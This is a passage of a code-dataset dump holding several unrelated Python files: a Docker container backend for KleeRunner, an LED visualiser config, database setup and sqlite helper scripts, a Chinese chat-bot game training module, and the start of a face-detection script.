self.ctx.get_object('DockerBackend.ResourcePool')\n if not success:\n raise DockerBackendException('Failed to setup resource pool')\n except Exception as e:\n _logger.error('Failed to get resource pool')\n _logger.error(e)\n raise DockerBackendException(\n 'Failed to get resource pool')\n\n # Initialise the docker client\n try:\n self._dc = self._resource_pool.get_docker_client()\n self._dc.ping()\n except Exception as e:\n _logger.error('Failed to connect to the Docker daemon')\n _logger.error(e)\n raise DockerBackendException(\n 'Failed to connect to the Docker daemon')\n\n try:\n # FIXME: Move this check into the resource pool so we can cache\n # the result of this check amoung runners.\n # Check we can find the docker image\n images = self._dc.images()\n assert isinstance(images, list)\n images = list(\n filter(lambda i: (i['RepoTags'] is not None) and self._dockerImageName in i['RepoTags'], images))\n if len(images) == 0:\n msg = 'Could not find docker image with name \"{}\"'.format(\n self._dockerImageName)\n raise DockerBackendException(msg)\n else:\n if len(images) > 1:\n msg = 'Found multiple docker images:\\n{}'.format(\n pprint.pformat(images))\n _logger.error(msg)\n raise DockerBackendException(msg)\n self._dockerImage = images[0]\n _logger.debug('Found Docker image:\\n{}'.format(\n pprint.pformat(self._dockerImage)))\n finally:\n # HACK: To not exhaust the resource pool we need to\n # return the client now.\n self._resource_pool.release_docker_client(self._dc)\n self._dc = None\n\n @property\n def name(self):\n return \"Docker\"\n\n @property\n def dockerStatsOnExitShimPathInContainer(self):\n if self._dockerStatsOnExitShimBinary == None:\n return None\n return self.getFilePathInBackend(self._dockerStatsOnExitShimBinary)\n\n @property\n def dockerStatsLogFileName(self):\n return 'exit_stats.json'\n\n @property\n def dockerStatsLogFileHost(self):\n return os.path.join(self.workingDirectory, self.dockerStatsLogFileName)\n\n @property\n def dockerStatsLogFileInContainer(self):\n return os.path.join(self.workingDirectoryInternal, self.dockerStatsLogFileName)\n\n def run(self, cmdLine, logFilePath, envVars):\n # Grab a docker client\n self._dc = self._resource_pool.get_docker_client()\n\n self._logFilePath = logFilePath\n self._outOfMemory = False\n outOfTime = False\n ulimits = []\n if self.stackLimit != None:\n # FIXME: Setting stack size in Docker seems broken right now.\n # See: https://github.com/docker/docker/issues/13521\n _logger.warning(\n \"Setting stack size is probably broken. If you get crashes don't set it!\")\n stackLimitInBytes = 0\n if self.stackLimit == 0:\n # Work out the maximum memory size, docker doesn't support\n # \"unlimited\" right now\n _logger.warning(\n \"Trying to emulate unlimited stack. Docker doesn't support setting it\")\n if self.memoryLimit > 0:\n # If a memory limit is set just set the stack size to the maximum we allow\n # self.memoryLimit is in MiB, convert to bytes\n stackLimitInBytes = self.memoryLimit * (2**20)\n else:\n # No memory limit is set. Just use the amount of memory on system as an\n # upper bound\n stackLimitInBytes = psutil.virtual_memory().total + psutil.swap_memory().total\n elif self.stackLimit > 0:\n stackLimitInBytes = self.stackLimit * 1024\n # I'm assuming the stack limit is set in bytes here. I don't actually know if\n # this is the case.\n ulimits.append(docker.utils.Ulimit(name='stack',\n soft=stackLimitInBytes,\n hard=stackLimitInBytes))\n _logger.info(\n 'Setting stack size limit to {} bytes'.format(stackLimitInBytes))\n\n extraHostCfgArgs = {}\n if len(ulimits) > 0:\n extraHostCfgArgs['ulimits'] = ulimits\n\n # Declare the volumes\n programPathInsideContainer = self.programPath()\n bindings = dict()\n\n if self._dockerStatsOnExitShimBinary:\n self.addFileToBackend(self._dockerStatsOnExitShimBinary, read_only=True)\n\n # Add aditional volumes\n for hostPath, (containerPath, read_only) in self._additionalHostContainerFileMaps.items():\n bindings[hostPath] = {'bind': containerPath, 'ro': read_only}\n\n # Try adding extra volumes\n for hostPath, props in self._extra_volume_mounts.items():\n bindings[hostPath] = props\n\n # Mandatory bindings\n bindings[self.workingDirectory] = {\n 'bind': self.workingDirectoryInternal, 'ro': False}\n bindings[self.hostProgramPath] = {\n 'bind': programPathInsideContainer, 'ro': True}\n\n _logger.debug('Declaring bindings:\\n{}'.format(\n pprint.pformat(bindings)))\n\n extraContainerArgs = {}\n\n if self.memoryLimit > 0:\n # http://docs.docker.com/reference/run/#memory-constraints\n #\n # memory=L= 0\n mem_set_to_use_str=str(mem_set_to_use)\n _logger.warning('FIXME Setting cpuset_mem is broken')\n raise Exception('Setting cpuset_mem is broken')\n # FIXME: Need to get this PR ( https://github.com/docker/docker-py/pull/1583 )\n # accepted for this to work.\n # extraHostCfgArgs['cpuset_mems'] = mem_set_to_use_str\n\n\n hostCfg = self._dc.create_host_config(\n binds=bindings,\n privileged=False,\n network_mode=None,\n **extraHostCfgArgs\n )\n\n # Modify the command line if necessary\n finalCmdLine = cmdLine\n if self._dockerStatsOnExitShimBinary:\n finalCmdLine = [self.dockerStatsOnExitShimPathInContainer,\n self.dockerStatsLogFileInContainer] + finalCmdLine\n _logger.debug('Command line inside container:\\n{}'.format(\n pprint.pformat(finalCmdLine)))\n\n # Finally create the container\n self._container = self._dc.create_container(\n image=self._dockerImage['Id'],\n command=finalCmdLine,\n environment=envVars,\n working_dir=self.workingDirectoryInternal,\n volumes=list(bindings.keys()),\n host_config=hostCfg,\n # The default. When all containers are created this way they will all\n # get the same proportion of CPU cycles.\n cpu_shares=0,\n **extraContainerArgs\n )\n _logger.debug('Created container:\\n{}'.format(\n pprint.pformat(self._container['Id'])))\n if self._container['Warnings'] != None:\n _logger.warning('Warnings emitted when creating container:{}'.format(\n self._container['Warnings']))\n\n exitCode = None\n startTime = time.perf_counter()\n self._endTime = 0\n try:\n self._dc.start(container=self._container['Id'])\n timeoutArg = {}\n if self.timeLimit > 0:\n timeoutArg['timeout'] = self.timeLimit\n _logger.info('Using timeout {} seconds'.format(self.timeLimit))\n exitCode = self._dc.wait(\n container=self._container['Id'], **timeoutArg)\n if exitCode == -1:\n # FIXME: Does this even happen? Docker-py's documentation is\n # unclear.\n outOfTime = True\n _logger.info('Timeout occurred')\n exitCode = None\n except requests.exceptions.ReadTimeout as e:\n _logger.info('Timeout occurred')\n outOfTime = True\n except docker.errors.NotFound as e:\n _logger.error(\n 'Failed to start/wait on container \"{}\".\\nReason: {}'.format(self._container['Id'], str(e)))\n finally:\n self.kill()\n\n runTime = self._endTime - startTime\n userCPUTime = None\n sysCPUTime = None\n\n if self._dockerStatsOnExitShimBinary:\n # Try to extract the needed stats\n try:\n with open(self.dockerStatsLogFileHost, 'r') as f:\n stats = json.load(f)\n userCPUTime = float(stats['cgroups']['cpu_stats']['cpu_usage'][\n 'usage_in_usermode']) / (10**9)\n sysCPUTime = float(stats['cgroups']['cpu_stats']['cpu_usage'][\n 'usage_in_kernelmode']) / (10**9)\n except Exception as e:\n _logger.error('Failed to retrieve stats from \"{}\"'.format(\n self.dockerStatsLogFileHost))\n _logger.error(str(e))\n _logger.error(traceback.format_exc())\n\n return BackendResult(exitCode=exitCode,\n runTime=runTime,\n oot=outOfTime,\n oom=self._outOfMemory,\n userCpuTime=userCPUTime,\n sysCpuTime=sysCPUTime)\n\n def kill(self):\n try:\n self._killLock.acquire()\n self._endTime = time.perf_counter()\n if self._container != None:\n _logger.info('Stopping container:{}'.format(\n self._container['Id']))\n try:\n containerStatus = self._dc.inspect_container(\n self._container['Id'])\n if containerStatus[\"State\"][\"Running\"]:\n self._dc.kill(self._container['Id'])\n except docker.errors.APIError as e:\n _logger.error('Failed to kill container:\"{}\".\\n{}'.format(\n self._container['Id'], str(e)))\n\n # Write logs to file (note we get binary in Python 3, not sure\n # about Python 2)\n with open(self._logFilePath, 'wb') as f:\n logData = self._dc.logs(container=self._container['Id'],\n stdout=True, stderr=True, timestamps=False,\n tail='all', stream=False)\n _logger.info('Writing log to {}'.format(self._logFilePath))\n f.write(logData)\n\n # Record if OOM occurred\n containerInfo = self._dc.inspect_container(\n container=self._container['Id'])\n self._outOfMemory = containerInfo['State']['OOMKilled']\n assert isinstance(self._outOfMemory, bool)\n\n try:\n _logger.info('Destroying container:{}'.format(\n self._container['Id']))\n # Note setting `v=True` is very important. This removes\n # the volumes associated with the container. Otherwise\n # we'll leave loads of stray volumes lying around.\n self._dc.remove_container(\n container=self._container['Id'], v=True, force=True)\n except docker.errors.APIError as e:\n _logger.error('Failed to remove container:\"{}\".\\n{}'.format(\n self._container['Id'], str(e)))\n self._container = None\n finally:\n if self._dc is not None:\n self._resource_pool.release_docker_client(self._dc)\n self._dc = None\n if self.resource_pinning and self._grabbed_cpus is not None:\n self._resource_pool.release_cpus(self._grabbed_cpus)\n self._grabbed_cpus = None\n self._killLock.release()\n\n def programPath(self):\n return '/tmp/{}'.format(os.path.basename(self.hostProgramPath))\n\n def checkToolExists(self, toolPath):\n if self._skipToolExistsCheck:\n _logger.info('Skipping tool check')\n return\n assert os.path.isabs(toolPath)\n # HACK: Is there a better way to do this?\n _logger.debug('Checking tool \"{}\" exists in image'.format(toolPath))\n tempContainer = self._dc.create_container(image=self._dockerImage['Id'],\n command=['ls', toolPath])\n _logger.debug('Created temporary container: {}'.format(\n tempContainer['Id']))\n self._dc.start(container=tempContainer['Id'])\n exitCode = self._dc.wait(container=tempContainer['Id'])\n self._dc.remove_container(container=tempContainer['Id'], force=True)\n if exitCode != 0:\n raise DockerBackendException(\n 'Tool \"{}\" does not exist in Docker image'.format(toolPath))\n\n @property\n def workingDirectoryInternal(self):\n # Return the path to the working directory that will be used inside the\n # container\n return self._workDirInsideContainer\n\n def addFileToBackend(self, path, read_only):\n if not os.path.isabs(path):\n raise DockerBackendException('path must be absolute')\n fileName = os.path.basename(path)\n\n if not os.path.exists(path):\n raise DockerBackendException(\n 'File \"{}\" does not exist'.format(path))\n\n if not isinstance(read_only, bool):\n raise DockerBackendException('\"read_only\" must be boolean')\n\n # FIXME: This mapping is lame. We could do something more sophisticated\n # to avoid this limitation.\n if fileName in self._usedFileMapNames:\n raise DockerBackendException(\n 'Mapping identicaly named file is not supported')\n self._additionalHostContainerFileMaps[\n path] = ( os.path.join('/tmp', fileName), read_only)\n _logger.debug('Adding mapping \"{}\" => \"{}\"'.format(\n path,\n self._additionalHostContainerFileMaps[path])\n )\n for _, props in self._extra_volume_mounts.items():\n if self._additionalHostContainerFileMaps[path] == props['bind']:\n raise DockerBackendException(\n 'Cannot add path \"{}\". It is already in use by \"{}\"'.format(\n path, self._extra_volume_mounts))\n self._usedFileMapNames.add(fileName)\n\n def getFilePathInBackend(self, hostPath):\n try:\n file_path, _ = self._additionalHostContainerFileMaps[hostPath]\n return file_path\n except KeyError as e:\n raise DockerBackendException(\n '\"{}\" was not given to addFileToBackend()'.format(hostPath))\n\n\ndef get():\n return DockerBackend\n","sub_path":"KleeRunner/Backends/Docker.py","file_name":"Docker.py","file_ext":"py","file_size_in_byte":35433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"97389113","text":"from __future__ import print_function\nfrom __future__ import division\nimport os\n\nLED_PIN = 18\n\nLED_FREQ_HZ = 800000\n\nLED_DMA = 5\n\nBRIGHTNESS = 255\n\nLED_INVERT = False\n\nSOFTWARE_GAMMA_CORRECTION = True\n\nN_PIXELS = 150\n\nGAMMA_TABLE_PATH = os.path.join(os.path.dirname(__file__), 'gamma_table.npy')\n\nMIC_RATE = 48000\n\nFPS = 50\n\n_max_led_FPS = int(((N_PIXELS * 30e-6) + 50e-6)**-1.0)\nassert FPS <= _max_led_FPS, 'FPS must be <= {}'.format(_max_led_FPS)\n\nMIN_FREQUENCY = 200\n\nMAX_FREQUENCY = 12000\n\nN_FFT_BINS = 24\n\nN_ROLLING_HISTORY = 2\n\nMIN_VOLUME_THRESHOLD = 1e-7\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"422513912","text":"#!/usr/bin/env python\n# encoding=utf-8\n# Autor: Fadiga\n\nfrom models import (Group, Operator, PhoneNumber, Contact,\n ContactGroup, Transfer, Settings)\n\n\ndef setup(drop_tables=False):\n \"\"\" create tables if not exist \"\"\"\n\n did_create = False\n\n for models in [Group, Operator, Contact, PhoneNumber,\n ContactGroup, Transfer, Settings]:\n if drop_tables:\n models.drop_table()\n if not models.table_exists():\n models.create_table()\n did_create = True\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70244735","text":"import asyncio\nimport re\nimport time\n\nimport nonebot\nimport pytz\n\nfrom hoshino.typing import CQEvent\nfrom . import sv\nfrom .ScoreCounter import ScoreCounter2\nfrom .duelconfig import *\n\n\n@sv.on_fullmatch(['培养帮助'])\nasync def gift_help(bot, ev: CQEvent):\n msg = '''\n╔ ╗ \n 培养帮助\n[技能一览] [性格一览]\n[查技能]{技能名}\n[查性格]{性格名}\n[修炼查询]\n[挂机修炼]{女友名}\n[结束修炼]\n[提升rank]{角色名}\n[角色升星] {角色名}\n╚ ╝\n '''\n await bot.send(ev, msg)\n\n\n@sv.on_prefix(['查性格'])\nasync def xiulian_start(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n if len(args) != 1:\n await bot.finish(ev, '请输入 查性格+性格名称 。', at_sender=True)\n name = args[0]\n if not character.get(name):\n await bot.finish(ev, f'未查询到名为\"{name}\"的性格', at_sender=True)\n msg = f'''\n{name}:\n{character[name]}\n '''.strip()\n await bot.send(ev, '\\n' + msg, at_sender=True)\n\nxingge_li = []\nfor i in character.keys():\n xingge_li.append(f'''\n{i}:\n{character[i]}\n '''.strip())\nxingge_all = '\\n\\n'.join(xingge_li)\n\nfrom hoshino.util.image_utils import CreateImg\nxingge_img = CreateImg(900, 2800, font_size=38)\nxingge_img.text((10, 10), xingge_all)\nxingge_img.save(R.img(\"ghs/cache/xingge_all.png\").path)\n\n@sv.on_fullmatch(['性格列表', '性格一览'])\nasync def skill_li(bot, ev: CQEvent):\n await bot.send(ev, R.img(\"ghs/cache/xingge_all.png\").cqcode)\n\n\n@sv.on_prefix(['查技能'])\nasync def xiulian_start(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n if len(args) != 1:\n await bot.finish(ev, '请输入 查技能+性格名称 。', at_sender=True)\n name = args[0]\n if not skill_def_json.get(name):\n await bot.finish(ev, f'未查询到名为\"{name}\"的技能', at_sender=True)\n cost_msg = ''\n if skill_def_json[name].get('cost'):\n cost_msg = f\"\\n触发消耗sp:{skill_def_json[name].get('cost')}\"\n msg = f'''\n{name}:\n发动消耗sp:{skill_def_json[name]['sp']}{cost_msg}\n{skill_def_json[name]['desc']}\n '''.strip()\n await bot.send(ev, '\\n' + msg, at_sender=True)\n\n\n@sv.on_fullmatch([\"技能列表\", \"技能一览\"])\nasync def skill_li(bot, ev: CQEvent):\n tas_list = []\n data = {\n \"type\": \"node\",\n \"data\": {\n \"name\": \"ご主人様\",\n \"uin\": \"1587640710\",\n \"content\": \"====== 技能列表 ======\"\n }\n }\n tas_list.append(data)\n t = list(skill_def_json.keys())\n step = 5\n b = [t[i:i + step] for i in range(0, len(t), step)]\n for x in b:\n msgli = []\n for i in x:\n cost_msg = ''\n if skill_def_json[i].get('cost'):\n cost_msg = f\"\\n触发消耗sp:{skill_def_json[i].get('cost')}\"\n msg = f'''{i}:\n发动消耗sp:{skill_def_json[i]['sp']}{cost_msg}\n{skill_def_json[i]['desc']}'''.strip()\n msgli.append(msg)\n data = {\n \"type\": \"node\",\n \"data\": {\n \"name\": \"ご主人様\",\n \"uin\": \"1587640710\",\n \"content\": \"\\n\\n\".join(msgli)\n }\n }\n tas_list.append(data)\n await bot.send_group_forward_msg(group_id=ev['group_id'], messages=tas_list)\n\n\n@sv.on_fullmatch(['修炼查询'])\nasync def my_fragment_list(bot, ev: CQEvent):\n gid = ev.group_id\n uid = ev.user_id\n duel = DuelCounter()\n CE = CECounter()\n if duel._get_level(gid, uid) == 0:\n msg = '您还未在本群创建过角色,请发送 创建角色 开始你的人生旅途。'\n await bot.send(ev, msg, at_sender=True)\n return\n equip_list = CE._get_fragment_list(gid, uid)\n cids = duel._get_cards(gid, uid)\n if len(equip_list) > 0:\n msg_list = '修炼列表:'\n for i in equip_list:\n if i[0] == 0 or i[0] not in cids:\n continue\n else:\n c = chara.fromid(i[0])\n name = c.name\n msg_list = msg_list + f\"\\n{name}:{i[1]}\"\n await bot.send(ev, msg_list, at_sender=True)\n else:\n await bot.finish(ev, '您还没有挂机修炼过角色', at_sender=True)\n\n\n@sv.on_prefix(['挂机修炼', '开始挂机'])\nasync def xiulian_start(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n gid = ev.group_id\n uid = ev.user_id\n if len(args) != 1:\n await bot.finish(ev, '请输入 挂机修炼+女友名 中间用空格隔开。', at_sender=True)\n name = args[0]\n cid = chara.name2id(name)\n if cid == 1000:\n await bot.send(ev, '请输入正确的角色名。', at_sender=True)\n return\n duel = DuelCounter()\n CE = CECounter()\n c = chara.fromid(cid)\n nvmes = get_nv_icon(cid)\n up_info = duel._get_fashionup(gid, uid, cid, 0)\n if up_info:\n fashion_info = get_fashion_info(up_info)\n nvmes = fashion_info['icon']\n owner = duel._get_card_owner(gid, cid)\n\n if uid != owner:\n msg = f'{c.name}现在正在\\n[CQ:at,qq={owner}]的身边哦,您无法绑定哦。'\n await bot.send(ev, msg)\n return\n if owner == 0:\n await bot.send(ev, f'{c.name}现在还是单身哦,快去约到她吧。{nvmes}', at_sender=True)\n return\n guajiinfo = CE._get_xiulian(gid, uid)\n if guajiinfo[0] > 0:\n cgj = chara.fromid(guajiinfo[0])\n nvmesgj = get_nv_icon(guajiinfo[0])\n up_info = duel._get_fashionup(gid, uid, guajiinfo[0], 0)\n if up_info:\n fashion_info = get_fashion_info(up_info)\n nvmesgj = fashion_info['icon']\n await bot.finish(ev, f'{cgj.name}已经在修炼中了哦。{nvmesgj}', at_sender=True)\n if uid == owner:\n xltime = time.time()\n xltime = math.ceil(xltime)\n CE._add_xiulian(gid, uid, cid, xltime)\n await bot.send(ev, f'您的女友{c.name}开始修炼了\\n注:一次性修炼最长不能超过24小时哦。{nvmes}', at_sender=True)\n\n\n@sv.on_fullmatch(['结束修炼', '取消修炼'])\nasync def xiulian_end(bot, ev: CQEvent):\n gid = ev.group_id\n uid = ev.user_id\n CE = CECounter()\n guajiinfo = CE._get_xiulian(gid, uid)\n if guajiinfo[0] == 0:\n await bot.finish(ev, f'您没有正在修炼中的女友,请输入 挂机修炼+女友名 开始修炼哦。', at_sender=True)\n cid = guajiinfo[0]\n endtime = time.time()\n endtime = math.ceil(endtime)\n jgtime = endtime - guajiinfo[1]\n if jgtime < 3600:\n CE._delete_xiulian(gid, uid)\n await bot.finish(ev, f'修炼结束,修炼时间小于1小时,无法获得修炼度。', at_sender=True)\n sj_msg = ''\n count = check_build_counter(gid, uid, BuildModel.KONGFU)\n if count < 2:\n if jgtime > 86400:\n xlmin1 = math.floor(jgtime / 60)\n sj_msg = sj_msg + f\"总共修炼时间{xlmin1}分钟,由于超过24小时,实际\"\n jgtime = 86400\n xlmin = math.ceil(jgtime / 3600)\n sj_msg = sj_msg + f\"修炼时间为{xlmin}小时,\"\n qinfen_flag = check_have_character(guajiinfo[0], \"勤奋\")\n if qinfen_flag:\n xlmin = int(xlmin * 1.5)\n CE._add_fragment_num(gid, uid, cid, xlmin)\n ex_msg = ''\n if count > 0:\n addexp = xlmin * GJ_EXP_RATE * count\n add_exp(gid, uid, guajiinfo[0], addexp)\n ex_msg += f\"受到道馆的影响额外增加了{addexp}点经验\"\n CE._delete_xiulian(gid, uid)\n c = chara.fromid(guajiinfo[0])\n nvmes = get_nv_icon(guajiinfo[0])\n duel = DuelCounter()\n up_info = duel._get_fashionup(gid, uid, guajiinfo[0], 0)\n if up_info:\n fashion_info = get_fashion_info(up_info)\n nvmes = fashion_info['icon']\n bd_msg = f\"修炼结束,{sj_msg}\\n您的女友{c.name}获得了{xlmin}点修炼度{ex_msg}\\n{nvmes}\"\n await bot.send(ev, bd_msg, at_sender=True)\n\n\n@sv.on_prefix(['升级rank', 'rank升级', '提升rank'])\nasync def up_rank(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n gid = ev.group_id\n uid = ev.user_id\n duel = DuelCounter()\n if duel_judger.get_on_off_status(ev.group_id):\n msg = '现在正在决斗中哦,请决斗后再进行提升rank吧。'\n await bot.send(ev, msg, at_sender=True)\n return\n CE = CECounter()\n if len(args) != 1:\n await bot.finish(ev, '请输入 rank升级+女友名 中间用空格隔开。', at_sender=True)\n name = args[0]\n cid = chara.name2id(name)\n if cid == 1000:\n await bot.finish(ev, '请输入正确的女友名。', at_sender=True)\n cidlist = duel._get_cards(gid, uid)\n if cid not in cidlist:\n await bot.finish(ev, '该女友不在你的身边哦。', at_sender=True)\n rank = CE._get_rank(gid, uid, cid)\n if rank == MAX_RANK:\n await bot.finish(ev, '该女友rank已升至满级,无法继续升级啦。', at_sender=True)\n new_rank = rank + 1\n rank_score = RANK_LIST[int(new_rank)]\n if get_weather(gid) == WeatherModel.YUNTIAN:\n rank_score = int(0.8 * rank_score)\n score_counter = ScoreCounter2()\n myscore = score_counter._get_score(gid, uid)\n if myscore < rank_score:\n await bot.finish(ev, f'升级rank所需金币不足!\\n由{rank}级升至{new_rank}级需要:{rank_score}个,您当前剩余:{myscore}个', at_sender=True)\n # 消耗rank证明\n if new_rank < 8:\n item = get_item_by_name(\"初级进阶许可\")\n elif 8 <= new_rank <= 13:\n item = get_item_by_name(\"中级进阶许可\")\n else:\n item = get_item_by_name(\"高级进阶许可\")\n if not check_have_item(gid, uid, item):\n await bot.finish(ev, f'你没有持有{item[\"name\"]},无法提升rank!', at_sender=True)\n use_item(gid, uid, item)\n score_counter._reduce_score(gid, uid, rank_score)\n c = chara.fromid(cid)\n CE._up_rank(gid, uid, cid)\n msg = f'\\n您花费了{rank_score}金币和对应级别证明为{c.name}提升了rank,当前rank等级为:{new_rank}级,女友战斗力大大提升!'\n await bot.send(ev, msg, at_sender=True)\n\n\n@sv.on_prefix(['角色升星', '星级提升'])\nasync def cardstar_up(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n gid = ev.group_id\n uid = ev.user_id\n CE = CECounter()\n duel = DuelCounter()\n if len(args) != 1:\n await bot.finish(ev, '请输入 角色升星+女友名 中间用空格隔开。', at_sender=True)\n name = args[0]\n cid = chara.name2id(name)\n if cid == 1000:\n await bot.finish(ev, '请输入正确的女友名。', at_sender=True)\n cidlist = duel._get_cards(gid, uid)\n if cid not in cidlist:\n await bot.finish(ev, '该女友不在你的身边哦。', at_sender=True)\n star = CE._get_cardstar(gid, uid, cid)\n if star == MAX_STAR:\n await bot.finish(ev, '该女友已升至满星,无法继续升星啦。', at_sender=True)\n new_star = star + 1\n needfragment = STAR_LIST[int(new_star)]\n\n card_fragment = CE._get_fragment_num(gid, uid, cid)\n mynum = int(card_fragment)\n nvmes = get_nv_icon_with_fashion(gid, uid, cid)\n if mynum < needfragment:\n await bot.finish(ev, f'升级到{new_star}星需要{needfragment}修炼度,您的修炼度为{mynum},修炼度不够。', at_sender=True)\n CE._add_cardstar(gid, uid, cid)\n await bot.send(ev, f'升星成功!\\n成功将您的女友{name}升到了{new_star}星,女友战斗力大大提升!{nvmes}', at_sender=True)\n","sub_path":"hoshino/modules/pcr_duel/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"334313481","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAltas, Bajas y Modificaciones\n\"\"\"\ndef conectar():\n global conn\n global ejecutor\n import sqlite3\n conn = sqlite3.connect('./registroHorario.db')\n ejecutor = conn.cursor()\n\ndef seleccion(query):\n try:\n consulta = ejecutor.execute(query)\n except NameError as variable_vacia:\n print(\"Usted debe conectar a la base de datos. Por favor use para ello la función conectar() antes de llamar a esta seleccion()\")\n except Exception as e:\n print(\"Error en el select\")\n return list(consulta)\n\n\ndef operacionDirecta(query):\n try:\n ejecutor.execute(query)\n except Exception as e:\n print(e)\n\n\ndef operacionSimple(tipo,tabla,campos,valores,clausulaWhere=None):\n \"\"\"\n operaciones simples de base de datos\n\n :param tipo: A (alta) B (Baja) M (Modificacion)\n :param tabla: string. tabla en la que operamos\n :param clausulaWhere: string. Condicion que sigue al ´WHERE\n :return:\n \"\"\"\n query = \"\"\n if tipo == \"A\":\n query = \"INSERT INTO %s (%s) VALUES (%s)\"%(tabla,campos,valores)\n if tipo == \"B\":\n query = \"DELETE FROM %s\"%tabla\n if tipo == \"M\":\n query = \"UPDATE %s SET %s = %s\" % (tabla, campos, valores)\n if clausulaWhere != None:\n query += \" WHERE %s\"%clausulaWhere\n\n\n try:\n consulta = ejecutor.execute(query)\n conn.commit()\n #print(\"Operacion realizada con exito! confimado impacto en Base de datos\")\n except Exception as e:\n print(\"Error al intentar operar.\")\n print(\"su consulta es:\\n\\t%s\"%query)\n print(e)\n\ndef enlistar(lista):\n \"\"\"\n Toma valores de las consultas y los transforma en listas.\n El unico caso en el que esto tiene sentido es si la consulta devuelve un único valor\n :param lista: lista de elementos extraídos de la BD\n :return: lista de un solo nivel\n \"\"\"\n respuesta = [x[0] for x in lista]\n return respuesta\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157939946","text":"import os\nimport math\nimport pickle\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\nimport torch\nimport torch.nn as nn\n# from face_ssd import build_ssd\nfrom face_detection_dsfd.face_ssd_infer import SSD\nfrom face_detection_dsfd.data import widerface_640, TestBaseTransform\nfrom face_detection_dsfd.layers.functions.detection import Detect\n\n\ndef set_device(gpus=None, use_cuda=True):\n use_cuda = torch.cuda.is_available() if use_cuda else use_cuda\n if use_cuda:\n gpus = list(range(torch.cuda.device_count())) if not gpus else gpus\n print('=> using GPU devices: {}'.format(', '.join(map(str, gpus))))\n else:\n gpus = None\n print('=> using CPU device')\n device = torch.device('cuda:{}'.format(gpus[0])) if gpus else torch.device('cpu')\n\n return device, gpus\n\n\ndef main(input_path, output_path, detection_model_path='weights/WIDERFace_DSFD_RES152.pth', batch_size=8,\n display=False, out_postfix='_dsfd.pkl', gpus=None):\n cuda = True\n torch.set_grad_enabled(False)\n device, gpus = set_device(gpus)\n if cuda and torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n else:\n torch.set_default_tensor_type('torch.FloatTensor')\n\n if output_path is None:\n output_filename = os.path.splitext(os.path.basename(input_path))[0] + out_postfix\n output_dir = os.path.split(input_path)[0]\n output_path = os.path.join(output_dir, output_filename)\n elif os.path.isdir(output_path):\n output_filename = os.path.splitext(os.path.basename(input_path))[0] + out_postfix\n output_path = os.path.join(output_path, output_filename)\n\n # Initialize detection model\n net = SSD(\"test\")\n net.load_state_dict(torch.load(detection_model_path))\n net.eval()\n\n # Support multiple GPUs\n if gpus and len(gpus) > 1:\n net = nn.DataParallel(net, gpus)\n\n # Initialize detection model\n # cfg = widerface_640\n # thresh = cfg['conf_thresh']\n # net = build_ssd('test', cfg['min_dim'], cfg['num_classes']) # initialize SSD\n # net.load_state_dict(torch.load(detection_model_path))\n # net = net.cuda()\n # net.eval()\n\n # cfg = widerface_640\n # thresh = cfg['conf_thresh']\n # net = torch.jit.load(detection_model_path, map_location=device)\n # net.eval()\n print('Finished loading detection model!')\n\n transform = TestBaseTransform((104, 117, 123))\n # detect = Detect(cfg['num_classes'], 0, cfg['num_thresh'], cfg['conf_thresh'], cfg['nms_thresh'])\n\n # Open target video file\n cap = cv2.VideoCapture(input_path)\n if not cap.isOpened():\n raise RuntimeError('Failed to read video: ' + input_path)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n target_vid_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n target_vid_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n # Calculate priors\n # image_size = (target_vid_height, target_vid_width)\n # featuremap_size = [(math.ceil(image_size[0] / (2 ** (2 + i))), math.ceil(image_size[1] / (2 ** (2 + i))))\n # for i in range(6)]\n # priors = get_prior_boxes(cfg, featuremap_size, image_size).to(device)\n\n cfg = widerface_640\n thresh = cfg['conf_thresh']\n image_size = (target_vid_height, target_vid_width)\n\n # # Initialize output video file\n # if output_path is not None:\n # if os.path.isdir(output_path):\n # output_filename = os.path.splitext(os.path.basename(input_path))[0] + '.mp4'\n # output_path = os.path.join(output_path, output_filename)\n # fourcc = cv2.VideoWriter_fourcc(*'x264')\n # out_vid = cv2.VideoWriter(output_path, fourcc, fps, (target_vid_width, target_vid_height))\n # else:\n # out_vid = None\n\n #\n max_im_shrink = ((2000.0 * 2000.0) / (target_vid_height * target_vid_width)) ** 0.5\n shrink = max_im_shrink if max_im_shrink < 1 else 1\n\n # For each frame in the video\n frame_bgr_list = []\n frame_tensor_list = []\n det_list = []\n for i in tqdm(range(total_frames)):\n ret, frame = cap.read()\n if frame is None:\n continue\n\n # Gather batches\n frame_bgr_list.append(frame)\n frame_tensor = torch.from_numpy(transform(frame)[0]).permute(2, 0, 1).unsqueeze(0).to(device)\n frame_tensor_list.append(frame_tensor)\n if len(frame_tensor_list) < batch_size and (i + 1) < total_frames:\n continue\n frame_tensor_batch = torch.cat(frame_tensor_list, dim=0)\n\n # Process\n detections_batch = net(frame_tensor_batch)\n # detections_batch = detect(pred[:, :, :4], pred[:, :, 4:], priors)\n for b, detections in enumerate(detections_batch):\n detections = detections.unsqueeze(0)\n\n det = []\n shrink = 1.0\n scale = 